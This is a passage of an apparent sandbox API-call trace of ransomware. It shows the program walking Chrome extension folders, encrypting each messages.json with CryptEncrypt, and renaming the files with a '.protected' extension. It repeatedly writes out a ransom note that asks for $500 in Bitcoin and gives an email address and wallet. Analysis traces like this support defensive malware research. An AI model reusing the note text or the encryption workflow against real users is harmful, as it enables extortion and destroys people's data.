lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.protected")) returned 1 [0080.951] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.951] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.951] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\RESTORE_FILES.txt") returned 163 [0080.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.952] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.952] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.952] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.953] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.953] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.953] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.953] CloseHandle (hObject=0x164) returned 1 [0080.953] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.953] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0080.953] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0080.953] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0080.953] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0080.953] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0080.953] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da") returned 145 [0080.953] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0080.953] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0080.953] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\*") returned 147 [0080.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.953] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.954] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.954] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.954] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.954] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.954] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\.") returned 147 [0080.954] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.954] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.954] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.954] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.954] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.954] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.954] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.954] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\..") returned 148 [0080.954] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.954] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.954] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.954] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.954] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.954] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.954] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.954] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.955] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.955] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.955] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.955] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0080.957] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.957] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0080.957] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.957] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.957] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.957] CloseHandle (hObject=0x168) returned 1 [0080.957] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.protected") returned 169 [0080.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.protected")) returned 1 [0080.959] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.959] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.959] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\RESTORE_FILES.txt") returned 163 [0080.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.960] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.960] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.961] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.961] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.961] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.961] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.961] CloseHandle (hObject=0x164) returned 1 [0080.961] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.961] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0080.961] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0080.961] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0080.961] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0080.961] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0080.961] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de") returned 145 [0080.961] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0080.961] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0080.961] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\*") returned 147 [0080.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.962] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.962] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.962] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.962] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.962] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\.") returned 147 [0080.962] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.962] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.962] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.962] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.962] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.962] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.962] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\..") returned 148 [0080.962] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.962] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.962] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.962] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.962] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.962] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.962] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.963] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.963] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.964] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.964] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.964] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2bd, lpOverlapped=0x0) returned 1 [0080.965] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.965] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2bd, lpOverlapped=0x0) returned 1 [0080.965] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.965] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.966] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.966] CloseHandle (hObject=0x168) returned 1 [0080.966] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.protected") returned 169 [0080.966] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 